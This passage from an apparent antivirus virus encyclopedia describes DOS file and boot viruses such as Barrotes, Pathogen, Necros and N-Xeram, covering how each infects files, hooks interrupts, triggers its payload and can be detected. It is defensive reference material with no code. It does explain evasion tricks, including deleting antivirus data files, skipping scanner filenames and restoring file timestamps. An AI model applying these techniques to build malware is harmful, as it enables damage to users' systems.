  28709. upon loading and executing an infected file. It will be obvious when
  28710. the virus infects .EXE files in the current drive for it takes a long
  28711. time, depending on the number of .EXE files in the current drive, to
  28712. load a file.
  28713.  
  28714. Damage: It slows down the loading of executable files.
  28715.  
  28716. Symptom:
  28717. 1) Infected files increase by 1,224-1,253 bytes.
  28718. 2) Very slow loading of executable files.
  28719.  
  28720. [Karnavali.1972]
  28721. Virus Type: File Virus
  28722. Other Name:
  28723. Virus Length:
  28724. Place of Origin:
  28725.  
  28726. PC Vectors Hooked:
  28727.  
  28728. Infection Procedure:
  28729. 1) Gets the dos variables.
  28730. 2) Reads drive C:. Reads FFFFh sectors, with starting sector
  28731.    5945h and 139E:0889h memory address for data transfer.
  28732. 3) Tries to write 4 sectors to drive C:. After writing, EXE and COM
  28733.    files that are executed will not get infected.
  28734.  
  28735. After rebooting the system, the system will hang and the keyboard
  28736. will be disabled.
  28737.  
  28738. [Tecla]
  28739. Virus Name: BARR1303
  28740. Virus Type: Polymorphic, File Virus
  28741. Other Name: TECLA
  28742. Virus Length: 2051 bytes
  28743. Virus Infect Type: COM and EXE files
  28744. Trigger Condition: September 23
  28745. Virus Re-infect: No
  28746. Virus Memory Type: High Memory Resident
  28747. Place of Origin:
  28748.  
  28749. PC Vectors Hooked: INT 16h, INT 21h, INT 24h
  28750.  
  28751. Infection Procedure:
  28752. The virus is a polymorphic type and infects both .COM and .EXE files.
  28753. It adds 1303 bytes to an infected file. It first decrypts its code,
  28754. which is attached to the host, using SUB 75H to each byte. It can be
  28755. seen from the decrypted data area of the virus code string "SSta
  28756. Tecla(MAD1)" which gives another name to the virus. It copies its
  28757. program (1033 bytes) to the high memory, 9F9A:0100; thus, overlaps
  28758. the video adapter memory. Once resident in the memory it checks if
  28759. the date is September 23. If it is, it activates its payload by
  28760. hooking to INT 16H (change to vector 9F9A:017C) and changes the
  28761. keyboard ASCII table. It increments all the unextended keyboard input
  28762. by 1 ASCII character. Thus, a keyboard input of "A" will display "B",
  28763. or an input of "." will display "/", and so on. Without the trigger
  28764. date it still hooks to INT 21h by changing its vector to its program
  28765. in the high memory 9F9A:016C to infect every loading and executing
  28766. program. It also hooks to INT 24h and changes its vector to 9F9A:0107
  28767. which is seen to give no payload.
  28768.  
  28769. Damage: Changes unextended keyboard input to an increment of 1 ASCII
  28770. character.
  28771.  
  28772. [Barrotes.1310.A]
  28773. Virus Name: BARR1310
  28774. Virus Type: File Virus
  28775. Other Name:
  28776. Virus Length: 1310 bytes
  28777. Virus Infect Type: .COM and .EXE files
  28778. Trigger Condition: January 5
  28779. Virus Re-infect: No
  28780. Virus Memory Type: High Memory Resident
  28781. Place of Origin:
  28782.  
  28783. PC Vectors Hooked: INT 1Ch, INT 21h
  28784.  
  28785. Infection Procedure:
  28786. The virus is a file type virus that infects both .COM and .EXE files.
  28787. It adds 1303 bytes to an infected file. It copies its program to the
  28788. high memory at 9F9C:0100; thus, overlapping with the video adapter
  28789. memory. It hooks to INT 21H by changing its vector to point to its
  28790. program at 9F9C:017B. This will allow the virus to infect loading
  28791. and executing files. Once it becomes resident in the memory it checks
  28792. the date. If it is January 5, it will change the interrupt vector of
  28793. INT 1CH to point to its program in the high memory at 9F9C:049F. Then
  28794. it overwrites the MBR of drive C; thus, destroying its partition. Since
  28795. INT 1CH is a clock tick interrupt, the program it is pointing to is
  28796. executed 18.2 times per second. The program at this interrupt displays:
  28797. "Virus BARROTES pro OSoft" on a blue background, and four vertical,
  28798. flickering bars across the screen. At this point, the machine can still
  28799. be used if the user can tolerate the eye straining bars.
  28800.  
  28801. Damage:
  28802. 1) Destroys drive C's MBR and partition table.
  28803. 2) Corrupts the video display.
  28804.  
  28805. [Cascade]
  28806. Virus Name: CAS1701A
  28807. Virus Type:  Polymorphic, File Virus
  28808. Other Name:
  28809. Variant: CASCADE.1704
  28810. Virus Length: 1,701 bytes
  28811. Virus Infect Type: .COM files
  28812. Virus Re-infect: no
  28813. Virus Memory Type: Memory resident, MCB type
  28814. Place of Origin:
  28815.  
  28816. PC Vectors Hooked: INT 21h
  28817.  
  28818. Infection Procedure:
  28819. The virus only infects .COM files. It increases an infected file's size
  28820. by 1,701 bytes. The virus infects the host file by attaching itself at
  28821. the end of the file.
  28822.  
  28823. It is memory resident and can be activated upon loading and executing
  28824. an infected .COM file. As a polymorphic virus, it first decrypts its
  28825. code. Then the virus copies its 1701 bytes program in the low memory,
  28826. after the DOS resident programs. Then it hooks to INT 21H by changing
  28827. its vector to point to its program at 17F8:031C. It uses the
  28828. interrupt's service 4BH to attach itself to the host file. After
  28829. attaching itself to the host, it encrypts its main program and writes
  28830. the new file to the disk. It was seen that the virus checks the current
  28831. year before it infects the host file, and the trigger year is 1988.
  28832. Matching this year, which will not happen unless there's something
  28833. wrong with the system clock, there is no payload seen.
  28834.  
  28835. The virus occupies 1,984 bytes in the memory when checked using DOS
  28836. CHKDSK.
  28837.  
  28838. Symptom:
  28839. 1) Infected files increase by 1,701 bytes.
  28840. 2) Decreases the memory by 1,984 bytes.
  28841.  
  28842. [Natas-1]
  28843. Alias: Never-1
  28844. Origin:
  28845. Eff Length: 1788 bytes
  28846. Virus Type: File Virus; Encryption Virus; .COM files only
  28847.  
  28848. Symptoms :
  28849. Infected files increase by 4744 bytes, decrease in available
  28850. memory by 6144 bytes. Program execution slows down.
  28851.  
  28852. General Comments:
  28853. The virus first decrypts 2300 bytes of its code and then
  28854. allocates 6144 bytes into the High Memory Area. It will then copy a
  28855. part of its code to the area where INT 1 Vector is pointing to thus
  28856. replacing it.  Then it will move 5111 bytes to the High Memory
  28857. Area. It will then hook INT 10, 13, 15 and 21.
  28858.  
  28859. Further analysis of the virus was not possible because it has replaced
  28860. the code for INT 1 which is the Single Step Interrupt which is used
  28861. by debuggers like DEBUG and S-ICE.  NATA4744 will format a track
  28862. on the hard disk every time INT 1 is used, and it will continue to do
  28863. so until all local fixed drives are formatted.
  28864.  
  28865. This message is found in the virus code:
  28866.  
  28867.     "Time has come to pay (c) 1994 NEVER-1"
  28868.  
  28869. [S_Bug.A]
  28870. Virus Type: Polymorphic Virus
  28871. Eff Length: 3500-5500 bytes
  28872. Virus Status:
  28873.  
  28874. Symptoms :
  28875. Increase in the size of infected COM and EXE files by 3500-5500
  28876. bytes and decrease in available memory by 10272 bytes.  Executing
  28877. programs may slow down due to the infection procedure of the virus.
  28878.  
  28879. General Comments:
  28880. This virus is a very complex and highly polymorphic virus.  It will
  28881. first decrypt 3504 bytes of its virus code and then allocate 10 kbytes
  28882. of memory.  It will then be resident in the High Memory Area.  It will
  28883. also hook INT 21h with infection triggers with services 3D, 4B and 6C.
  28884.  
  28885. Files infected by the virus are more likely to have file sizes as this
  28886. virus randomly assigns codes for decryption of the real virus code
  28887. which is 3504 bytes.  File sizes may be from 3500 bytes to 5500 bytes.
  28888. All COM and EXE files that are opened, executed or copied will be
  28889. infected if the following condition is satisfied COMSPEC=COMMAND.COM.
  28890. This condition is also the trigger of the virus if it is resident or
  28891. not.
  28892.  
  28893. This message is found in the virus code:
  28894.  
  28895.      "Satan Bug Virus - Little Loc"
  28896.  
  28897. [Smeg.Pathogen]
  28898. Alias: SMEG v0.1
  28899. Origin : United Kingdom
  28900. Eff Length : 4432-4447 bytes
  28901. Virus Type:
  28902.  
  28903. Symptoms :
  28904. Increase in file size of EXE and COM programs with a size of
  28905. 4432-4447 bytes and decrease of 7872 in available memory.
  28906.  
  28907. General Comments:
  28908. On the first infection, this virus will first allocate 7872 bytes in
  28909. the High Memory Area and then transfer 3700 bytes of its code to that
  28910. area.  It will then hook INT 21, INT 13, INT 20 and will make
  28911. INT 3 as INT 21.
  28912.  
  28913. Pathogen is very complex and it is a polymorphic type of virus.
  28914. This virus will infect COM and EXE files that are opened, executed
  28915. and copied.  It will also display a "Memory allocation Error" when
  28916. an infected file attempts to be memory resident.
  28917.  
  28918. The danger Pathogen brings is that when the system date is Monday and
  28919. the time is 5:00 - 5:59 PM it writes zeroes onto the sectors of
  28920. the hard disk randomly, thus destroying some, if not all, of the data
  28921. in the drive. It will also trash or reset the BIOS of the computer.
  28922.  
  28923. The virus displays the following messages on the screen:
  28924.  
  28925.  "Your hard-disk is being corrupted, courtesy of PATHOGEN!"
  28926.  "Programmed in the U.K. (Yes, NOT Bulgaria) (c) The Black Baron 1993-4"
  28927.  "Featuring SMEG v0.1 : Simulated Metamorphic Encryption Generator"
  28928.  " 'Smoke me a kipper, I'll be back for breakfast.....!"
  28929.  "Unfortunately some of your data won`t!!!!!"
  28930.  
  28931. [Cawber]
  28932. Virus Type: Polymorphic
  28933. Virus Length: 2010 bytes
  28934. Virus Memory Type: Non-memory resident
  28935. Place of Origin:
  28936.  
  28937. PC Vectors Hooked:
  28938.  
  28939. Infection Procedure:
  28940. The virus is a polymorphic type that first decrypts its decryptor using
  28941. 63 bytes of data in its viral code. Each byte, as stored in the AX
  28942. register, is decrypted using SHL AX,1 and is added to the BP register.
  28943. The final result stored in BP after 63 decryptions will be the
  28944. decryptor. The virus then decrypts its 2,010 bytes code using XOR AX,
  28945. BP, where AX contains a word of the encrypted virus code. How it
  28946. allocates memory to make itself memory resident was not seen and its
  28947. hook to any interrupts. There is also no infection trigger.
  28948.  
  28949. [Sayha]
  28950. Virus Type: File Virus
  28951. Virus Length:
  28952. Virus Re-infect: Does not reinfect
  28953. Virus Memory Type: High Memory
  28954. Place of Origin:
  28955.  
  28956. PC Vectors Hooked: Int 21h
  28957.  
  28958. Infection Procedure:
  28959. 1) Loads itself to high memory, loading approximately 9040 bytes.
  28960. 2) Infects *.COM and *.EXE files by attaching itself to the host
  28961.    program.
  28962. 3) Moves the virus code by batches, copying its code 2 bytes at a time
  28963.    in different locations.
  28964.  
  28965. Damage:
  28966. 1) Increases file size.
  28967. 2) Occupies space in HMA.
  28968.  
  28969. Symptom: Delay in program execution.
  28970.  
  28971. [SCITZO]
  28972. Virus Type: File Virus
  28973. Virus Length: Approximately 1329 bytes
  28974. Virus Memory Type: High Memory
  28975. Place of Origin:
  28976.  
  28977. PC Vectors Hooked: Int 21h
  28978.  
  28979. Infection Procedure:
  28980. 1) Loads itself to high memory, allocating 1360 bytes (using MEM).
  28981. 2) Moves 1329 (0531H) bytes to high memory.
  28982. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  28983.    program, adding approximately 1329 bytes. Loads the virus first
  28984.    before running the host program.
  28985.  
  28986. The virus when resident in memory, will infect any executed *.COM and
  28987. *.EXE files. It does not do anything special. It just replicates when
  28988. it is memory resident. Infects only executed files.
  28989.  
  28990. Damage:
  28991. 1) Free memory decreases.
  28992. 2) Infected files increase in length.
  28993. 3) Adds approximately 1329 bytes.
  28994.  
  28995. Symptom: Delay in program execution due to virus activity.
  28996.  
  28997. Detection method: Locate the virus text strings.
  28998.  
  28999. [Necros]
  29000. Origin: Tralee, Co. Kerry, Ireland
  29001. Eff Length: 1164 bytes
  29002. Virus Type: File Virus; Encryption Virus; .COM files
  29003.  
  29004. Symptoms :
  29005. It will increase com files by 1164 bytes, decrease in available
  29006. memory by 2624 bytes.  Execution of running programs slows down.
  29007. A write-protect error appears when a program is opened and the disk
  29008. is write protected.
  29009.  
  29010. General Comments:
  29011. This virus will first decrypt its code with a size of 1142 bytes and
  29012. then will hook INT 3, INT 21 and INT 1C.  Then it will allocate 2624
  29013. bytes in the memory. This virus will be MCB resident after executing
  29014. the carrier program because it will execute a TSR command.
  29015.  
  29016. It will immediately infect .COM files that are executed.  When .EXE
  29017. files are run, Necros will create a hidden .COM file of the same name
  29018. and will increase the file size to 1164 bytes.
  29019.  
  29020. The Necros virus will check if the system date is November 21.  If
  29021. this condition is satisfied then it will start to produce a countdown-
  29022. like sound 2 minutes after the virus has been loaded.  This will go
  29023. on for 15 seconds before this message is displayed on the screen:
  29024.  
  29025.       "Virus V2.0 (c) 1991 Necros the Hacker."
  29026.       "Written on 29,30 June in Tralee, Co. Kerry, Ireland"
  29027.       "Happy Birthday, Necros!"
  29028.  
  29029. [Helloween.1376]
  29030. Virus Type: File Virus
  29031. Other Name:
  29032. Virus Length:
  29033. Virus Infect Type: EXE and COM files
  29034. Trigger Condition: November 1
  29035. Place of Origin:
  29036. Virus Memory Type: High Memory Type
  29037.  
  29038. PC Vectors Hooked: Int 21h
  29039.  
  29040. Infection Procedure:
  29041. 1) Loads itself into the high memory immediately copying from
  29042.    address 1155:0129h to 9F89:0000h, copying 1376 bytes.
  29043. 2) Hooks INT 21h.
  29044. 3) Gets the Real-Time Clock date, and returned values are in BCD.
  29045. 4) Checks whether the date is November 1. If yes, it clears the screen,
  29046.    background color is red and this message appears in the
  29047.    middle of the screen:
  29048.  
  29049.    "Nesedte porad u pocitace a zkuste jednou delat neco
  29050.      rozumneho!"
  29051.    "**************"
  29052.    "!! Poslouchjte HELLOWEEN - nejlepsi metalovou skupinu !!"
  29053.  
  29054.    Then by pressing any key, the machine will reboot. Making
  29055.    no infection.
  29056.  
  29057.    But if the date is not November 1, the COM and/or EXE
  29058.    files that are executed will get infected.
  29059.  
  29060. Detection method : Infected files increase up to 1376 bytes.
  29061.  
  29062. [Delta.1163]
  29063. Virus Type:  Polymorphic, File Virus
  29064. Other Name:
  29065. Virus Length: 1163 bytes
  29066. Original Name: DELTA
  29067. Virus Infect Type: .COM and .EXE files
  29068. Trigger Condition: November 4
  29069. Virus Re-infect: no
  29070. Discovery Date: February 1996
  29071. Virus Memory Type: High memory resident
  29072. Place of Origin: Brazil
  29073.  
  29074. PC Vectors Hooked: INT 21H
  29075.  
  29076. Infection Procedure:
  29077. As a polymorphic virus it first decrypts its main program using XOR C0H
  29078. to each byte. It infects its host by attaching itself at the end of the
  29079. file. It adds 1,163 bytes to an infected file. Then it copies its
  29080. program in the high memory at 9F69:0000 and jumps there. It hooks INT
  29081. 21H by pointing its vectors to 9F69:01C5. The virus can become memory
  29082. resident upon loading and executing an infected file.
  29083.  
  29084. Being memory resident it can attach itself to an executable file when
  29085. the file uses service 4BH of the hooked INT 21H. During infection the
  29086. virus checks if the current month is November and the current day is
  29087. 4. At this time the virus resets the drive C:\ BIOS configuration and
  29088. changes the boot sequence to search drive C:\ first upon bootup. Then
  29089. waits for 30 sec. before making a warm boot. The following messages
  29090. appear:
  29091.  
  29092.         "Good bytes from (DEL)ta Virus!!!"
  29093.         "      Reset in 30 seconds.      "
  29094.  
  29095. After which, the hard disk will be disabled, as if it already has a
  29096. corrupted partition table. Upon infecting an executable file it makes
  29097. its second infection to COMMAND.COM in drive A:\; thus, corrupting it
  29098. and disabling proper bootup. The effect of the payload can be easily
  29099. solved by reconfiguring the hard disk in the BIOS and replacing the
  29100. infected COMMAND.COM with a new one since the virus doesn't write to
  29101. the MBR. Other text strings can be seen inside the virus code beside
  29102. the one displayed upon execution of the payload which is:
  29103.  
  29104.         "Brazil - 02/96"
  29105.  
  29106. Damage:
  29107. 1) Resets the hard disk BIOS configuration.
  29108. 2) Corrupts COMMAND.COM.
  29109.  
  29110. Symptom: Infected files increase by 1163 bytes.
  29111.  
  29112. [Delwin.1759]
  29113. Virus Type:  Polymorphic, Boot/File Virus
  29114. Virus Length: 2048 bytes
  29115. Virus Infect Type: .COM and .EXE files
  29116. Virus Re-infect: no
  29117. Discovery Date:
  29118. Virus Memory Type: High memory resident
  29119. Place of Origin:
  29120.  
  29121. PC Vectors Hooked: INT 13h, INT 21h, INT 1Ch
  29122.  
  29123. Infection Procedure:
  29124.  
  29125. Infecting the Master Boot Sector:
  29126. The virus primarily infects the Master Boot Sector of drive C:\. As
  29127. a polymorphic virus it first decrypts 1,714 bytes of its code using XOR
  29128. 9B. Then it reads the boot sector of drive C:\ in its program. It saves
  29129. a copy of this sector to head 0, cylinder 0, sector 2 of drive C:\.
  29130. Then in makes a byte output twice to port 70H whose purpose is unknown
  29131. due to the unavailability of hardware port reference. The virus makes a
  29132. copy of its program, occupying 4 sectors, to head 0, cylinder 0, sector
  29133. 3 of drive C:\. Then the virus modifies the first 46 bytes of the boot
  29134. sector copied in its program and writes it back to the boot sector of
  29135. drive C:\
  29136.  
  29137. Infecting Executable Files:
  29138. Once the virus has infected the boot sector of drive C:\ it becomes
  29139. memory resident upon system bootup. Upon bootup it first allocates space
  29140. in the high memory starting at 9E70:0000. Then it reads its program,
  29141. which occupies 4 sectors, from the infected drive C:\ starting from
  29142. sector 3, cylinder 0, head 0 to its allocated space in the high memory
  29143. (9E70:0100). From there it hooks to INT 13H and INT 21H to point to its
  29144. program in the high memory which will enable the virus to attach itself
  29145. to any loading and executing .COM or .EXE file. Then after hooking to
  29146. the interrupts it retrieves the original boot sector from head 0,
  29147. cylinder 0, sector 2 of drive C:\ to resume normal bootup. At this point
  29148. the virus is already memory resident and can infect executable files
  29149. when loaded, executed and copied. It first searches for COMMAND.COM to
  29150. infect.
  29151.  
  29152. The virus infects the file by attaching  itself at the end of the host
  29153. file. However, its attachment most of the time is not complete and
  29154. sometimes just corrupts the program so the size added to the infected
  29155. file is not definite. No trigger or payload exists.
  29156.  
  29157. Damage: Corrupts executable files.
  29158.  
  29159. Symptom: Slows down file loading and execution time.
  29160.  
  29161. [Lemming.2160]
  29162. Virus Type: File Virus
  29163. Place of Origin:
  29164. Virus Memory Type: Non resident type
  29165.  
  29166. PC Vectors Hooked: Int 21
  29167.  
  29168. Infection Procedure:
  29169. 1) Encrypts data from 114C:[SI+BP],XOR to 49h producing a message
  29170.    that reads:
  29171.  
  29172.             "TBDRV   SP"
  29173.             "The Rise and Fall of ThunderByte-1994-Australia"
  29174.             "You will Never Trust Anti-Virus Software Again!!"
  29175.             "[LEMMING] ver .99"
  29176.             "TBAVTBSCANNAVVSAFEFPROT"
  29177.             "COMcomEXEexe"
  29178.  
  29179. 2) Gets the dos variable and points to "[LEMMING] ver .99."
  29180.  
  29181. While the virus is memory resident, a write-protect error will
  29182. appear if the user tries to execute an EXE or COM file with a
  29183. write-protected disk.
  29184.  
  29185. [Wulf.1500-1]
  29186. Other Name: Wulf
  29187. Virus Type: File Virus
  29188. Virus Length: Approximately 1500 bytes
  29189. Virus Memory Type: High Memory
  29190. Place of Origin:
  29191.  
  29192. PC Vectors Hooked: Int 13h, Int 21h
  29193.  
  29194. Infection Procedure:
  29195. 1) Loads itself to high memory after decryption, allocating 2976 bytes
  29196.    (9F46:0000).
  29197. 2) Moves 1500 (05CCH + 0010H) bytes onto the high memory.
  29198. 3) Infects *.EXE files. Copies the virus code to the host program,
  29199.    adding approximately 1500 bytes. Loads the virus first before
  29200.    running the host program.
  29201. 4) While memory resident, the virus infects all executed EXE files.
  29202.  
  29203. The virus reacts ordinarily by allocating space in the memory before
  29204. infecting files. Nothing extraordinary happens. It just attaches its
  29205. code to the host program after it is loaded from the memory.
  29206.  
  29207. Damage:
  29208. 1) Decrease in free memory.
  29209. 2) Increase in file size.
  29210.  
  29211. Symptom: May display
  29212.  
  29213.     "TBMEMXXXTBCHKXXXTBDSKXXXTBFILXXXPSQRW"
  29214.     "[WULF] (c) 1995-96 Werewolf"
  29215.     "CLEAN.AVP.TB.V.SCAN.NAV.IBM.FINDV.GUARD.FV.CHKDSK"
  29216.  
  29217. which appears in the virus code.
  29218.  
  29219. Detection method: Decrypt the virus code, then look for the above
  29220. strings.
  29221.  
  29222. [Teraz.2717]
  29223. Virus Type: File Virus
  29224. Virus Length: Approximately 2717 bytes
  29225. Virus Re-infect: Does not re-infect, infected file size is consistent
  29226. Virus Memory Type: Non Resident
  29227. Place of Origin:
  29228.  
  29229. PC Vectors Hooked: Int 21h
  29230.  
  29231. Infection Procedure:
  29232. Directly infects *.COM and *.EXE files. Copies the virus code to the
  29233. host program, adding approximately 2717 bytes. Loads first the virus
  29234. before running the host program.
  29235.  
  29236. The virus, when executed, infects any executed *.COM and *.EXE files.
  29237. It does not do anything special. It just replicates when it
  29238. is resident in the memory. Only infects executed files.
  29239.  
  29240. Damage:
  29241. 1) Increase in file size.
  29242. 2) Adds approximately 2717 bytes.
  29243.  
  29244. Symptom:
  29245. Delay in program execution due to virus activity.
  29246.  
  29247. [N-Xeram]
  29248. Other Name: Xeram
  29249. Virus Type: File Virus
  29250. Virus Length: Approximately 1667-1678 bytes
  29251. Virus Re-infect: Does not re-infect, infected file size is consistent.
  29252.                  If the file is already corrupted it skips and looks
  29253.                  for another EXE file.
  29254. Virus Memory Type: Non Resident, Direct Infector
  29255. Trigger Condition: Checks for system date. If the day is the 13th of
  29256.                    any month, it will name itself N-XERAM. Otherwise,
  29257.                    it will name itself plainly as XERAM.
  29258.  
  29259. PC Vectors hooked: Int 21h
  29260.  
  29261. Infection Procedure:
  29262. Directly infects *.EXE files when an infected file is executed. Copies
  29263. the virus code to the host program, adding approximately 648 bytes.
  29264. Loads first the virus before running the host program.
  29265.  
  29266. Special note: The virus initially searches for *.COM files. It picks
  29267. COMMAND.COM first, and infects it. After infecting COMMAND.COM,
  29268. the virus searches for *.EXE files. It does not search for *.COM files
  29269. again. It only searches for *.EXE.
  29270.  
  29271. The virus first gets the system date to compare the day (to
  29272. establish the name), then sets DTA. The virus then searches for *.EXE
  29273. files within the directory using Int 21 (4E). When the search is
  29274. successful, the virus gets the file's attribute using Int 21 (43).
  29275. It changes its attribute to enable the write function,
  29276. (especially for the COMMAND.COM). It takes note of the file time and
  29277. date using Int 21 (51) so that when it accomplishes its task of
  29278. altering the code, it can save it using the original file time and
  29279. date. This therefore deceives the user that the file was never been
  29280. changed.
  29281.  
  29282. After the alteration, the virus then protects itself from the following
  29283. anti-virus programs, by deleting it using Int 21 (41):
  29284.  
  29285.            1.  /NCDTREE/NAV_._NO
  29286.            2.  /CHKLIST.MS
  29287.            3.  /SCANVAL.VAL
  29288.  
  29289. These files are virus information or data files used by the respective
  29290. anti-virus programs. We can classify this virus as an anti-anti-virus
  29291. virus.
  29292.  
  29293. *Every time an infected file is executed, one EXE file is infected
  29294. within the same directory.
  29295.  
  29296. Damage:
  29297. 1) Increase in file size, adds approximately 1667-1678 bytes.
  29298. 2) Corrupts COMMAND.COM, making it unusable. Adds 1674 bytes.
  29299.    Infected EXE files run normally.
  29300.  
  29301. Symptom: Delay in program execution due to virus activity.
  29302.  
  29303. [Despro11]
  29304. Virus Type:  Polymorphic, File Virus
  29305. Virus Length: 2,406-2,409 bytes
  29306. Virus Infect Type: .COM and .EXE files
  29307. Virus Re-infect: no
  29308. Virus Memory Type: High memory resident
  29309. Place of Origin:
  29310.  
  29311. PC Vectors Hooked: INT 21h, INT 24h
  29312.  
  29313. Infection Procedure:
  29314. The virus infects .COM and .EXE files. It increases an infected file's
  29315. size by 2,406 bytes for .COM file and 2,409 for .EXE files. The virus
  29316. infects the host file by attaching itself at the end of the file. The
  29317. virus can become memory resident upon loading and executing an
  29318. infected .COM or .EXE file. As a polymorphic virus, it first decrypts
  29319. its code, then the virus allocates space in the high memory starting
  29320. at 9E80:0000. Then it copies its  code there to stay resident. Once
  29321. resident it hooks to INT 21H by pointing its vector to its program
  29322. in the high memory at 9E80:01BC. The virus uses this interrupt to be
  29323. able to attach itself to the loading and executing files using service
  29324. 4BH of the interrupt. During infection it will first hook to INT 24H
  29325. (Critical Error Handler) to disable the error display during a host
  29326. file write error, thus, the infection will not be obvious. Then it
  29327. will search for COMMAND.COM in the root directory of the current drive
  29328. and infect it if it is still not infected. Thus, after the next bootup
  29329. in the same drive, the virus will immediately become resident, infecting
  29330. the executable files that will be loaded in the memory. Then finally,
  29331. it will infect the current file that has been loaded in the memory. The
  29332. virus sometimes cannot attach itself completely to its host file, and
  29333. thus, just corrupting it. There is no payload or trigger.
  29334.  
  29335. Damage: Corrupts COMMAND.COM and executable files which can cause the
  29336. system to hang.
  29337.  
  29338. Symptom:
  29339. Increases the host's file size by 2,409 bytes for .COM file and
  29340. 2,406 bytes for .EXE file.
  29341.  
  29342. [Neuroquila]
  29343. Alias:
  29344. Place of Origin:
  29345. Eff Length: 4622 bytes
  29346. Virus Type: File Virus, Encryption Virus
  29347.  
  29348. General Comments:
  29349. The NEUROQUI virus will decrypt a part of its code at the beginning of
  29350. its execution and will decrypt 4622 bytes. Then it will copy this to
  29351. the OS area 0000:7C00.  Then it will hook INT 1.
  29352.  
  29353. [Keypress-6]
  29354. Virus Type : File Virus
  29355. Other Name :
  29356. Virus Length :
  29357. Place of Origin :
  29358. Virus Memory Type : High Memory Type
  29359.  
  29360. PC Vectors Hooked : Int 21h, Int 1Ch
  29361.  
  29362. Infection Procedure:
  29363. 1) Saves the values of all the registers.
  29364. 2) Loads itself to the high memory, 9FA3:100 loading 1216 bytes.
  29365. 3) Hooks Int 21h and Int 1Ch (Timer Tick Interrupt), sets a value,
  29366.    then returns the original values to the registers.
  29367.  
  29368. [Screaming_Fist]
  29369. Other Name: SFIST696
  29370. Virus Type: File Virus
  29371. Virus Length: Approximately 675 bytes (moves 696 bytes to memory)
  29372. Virus Memory Type: High Memory
  29373. Place of Origin:
  29374.  
  29375. PC Vectors Hooked: Int 21h
  29376.  
  29377. Infection Procedure:
  29378. 1) Loads itself to high memory, loading approximately 2,048 (9F80:0000)
  29379.    bytes.
  29380. 2) Infects *.COM and *.EXE files. Copies the virus code to the host
  29381.    program, adding approximately 696 (02B8H) bytes. Loads first the
  29382.    virus before running the host program.
  29383. 3) While in the memory, the virus infects all executed COM and EXE
  29384.    files.
  29385.  
  29386. The virus code is decrypted. The virus reacts ordinarily by allocating
  29387. space in the memory before infecting files. Nothing extraordinary
  29388. happens. It just attaches its code to the host program after it is
  29389. loaded from the memory.
  29390.  
  29391. Symptom:
  29392. 1) Decrease in free memory.
  29393. 2) Increase in file size.
  29394. 3) May display:
  29395.  
  29396.         "Screaming Fist IIV"
  29397.  
  29398. which appears in the decrypted code.
  29399.  
  29400. Actual recognizable string: "C:\COMMAND>COM.Screaming Fist IIV"
  29401.  
  29402. Detection method: Decrypt the virus code before detection. Check for
  29403. the above strings.
  29404.  
  29405. [PH33R.1332-1]
  29406. Alias:
  29407. Origin :
  29408. Eff Length : 1332 bytes
  29409.  
  29410. Symptoms :
  29411. Increase in file size of EXE, COM, and DLL programs with a size of
  29412. 1332 bytes and decrease of 2672 in available memory.  When in a
  29413. write-protected floppy, it usually displays a "Write Protect
  29414. Error" message when there is an attempt to read from it.
  29415.  
  29416. General Comments:
  29417. On the first infection, this virus will first allocate 2672 bytes in
  29418. the High Memory Area and then transfer 1332 bytes of its code to that
  29419. area.  It will then hook INT 21 with infection procedures to
  29420. services 4B(Execute Program), 6C(Extended Open Create), 56(Rename
  29421. File), and 43(Get File Attributes).
  29422.  
  29423. This virus will infect all EXE, COM, DLL files that are opened,
  29424. renamed, or executed.  It will also avoid files that ends with the
  29425. string "AV" (NAV, TBAV), "AN" (PCSCAN, SCAN) and "DV".
  29426.  
  29427. The virus is named as such because of the string "PH33R" found in the
  29428. virus code.
  29429.  
  29430. [Changsha]
  29431. Virus Type:  Parasitic, File Virus
  29432. Virus Length: 3,072-3,091 bytes
  29433. Virus Infect Type: .COM and .EXE files
  29434. Trigger Condition: Sunday
  29435. Virus Re-infect: no
  29436. Discovery Date: 1991
  29437. Virus Memory Type: Memory resident, MCB type
  29438. Place of Origin: Changsha China
  29439.  
  29440. PC Vectors Hooked: INT 8h, INT 13h, INT 21h
  29441.  
  29442. Infection Procedure:
  29443. The virus infects both .COM and .EXE files. It increases the infected
  29444. file's size by 3,072 for .COM and 3,091 for .EXE. It infects its host
  29445. by attaching itself at the end of the file. The virus allocates its
  29446. memory resident code in the low memory after the DOS resident programs.
  29447. The virus code will become memory resident upon loading, executing,
  29448. and copying an infected file. While resident in the memory it can
  29449. infect executable files by doing the same. It hooks INT 21H by
  29450. pointing its vector to its program in the low memory at 17F8:01C0. A
  29451. hook to this interrupt will enable the virus to attach itself to the
  29452. host. It also hooks INT 8H (changed to 17F8:02E1) and INT 13H (changed
  29453. to 17F8:0BED) but the payload is not seen.
  29454.  
  29455. In its hook to INT 21H it gets the current date and if the current day
  29456. is Sunday, it will load itself and infect all the executable files in
  29457. the current directory. It will be noticed that the date and time
  29458. attributes of infected files at this day will be set to 1-1-94 and
  29459. 1:15a. The infected files at this day will also be corrupted and will
  29460. not run properly. Other than Sunday the virus will just replicate
  29461. itself to the file. If checked from DOS CHKDSK.EXE the memory
  29462. occupied by the virus is 3,344 bytes. The following text strings can
  29463. be seen inside the virus code:
  29464.  
  29465.            "Auto-Copy Deluxe R3.00"
  29466.            "(C) Copyright 1991. Mr YaQi. Changsha China"
  29467.            "No one can Beyond me!"
  29468.  
  29469. Damage: Corrupts COM and EXE files.
  29470.  
  29471. Symptom:
  29472. 1) Increases the host's file size by 3,072-3,091 bytes.
  29473. 2) Sets the time and date attributes to 1-1-94, 1:15a.
  29474.  
  29475. [Chao.1241]
  29476. Virus Type:  Parasitic, File Virus
  29477. Virus Length: 1,241-1,247 bytes
  29478. Original Name: CHAOS
  29479. Virus Infect Type: .COM and .EXE files
  29480. Virus Re-infect: no
  29481. Virus Memory Type: Memory resident, MCB type
  29482. Place of Origin:
  29483.  
  29484. PC Vectors Hooked: INT 21h, INT 13h, INT 24h
  29485.  
  29486. Infection Procedure:
  29487. The virus infects both .COM and .EXE files. It can become memory
  29488. resident upon loading and executing an infected file. It increases
  29489. the size of an infected file by 1,241 bytes for .COM file and
  29490. 1,247 bytes for .EXE file.
  29491.  
  29492. Upon activation the virus stays resident in the low memory, after
  29493. the DOS resident programs. It hooks INT 21H by pointing its vector
  29494. to its program in the low memory at 1808:020E to enable it to attach
  29495. to executing files using the 4BH service of the interrupt. It also
  29496. hooks INT 24H (Critical Error Handler) to disable the error message
  29497. display during a host file write error. After the virus has loaded
  29498. itself in the memory it first checks the current date. If it is
  29499. September 13 the payload will be executed. The following trigger
  29500. dates were also seen:
  29501.  
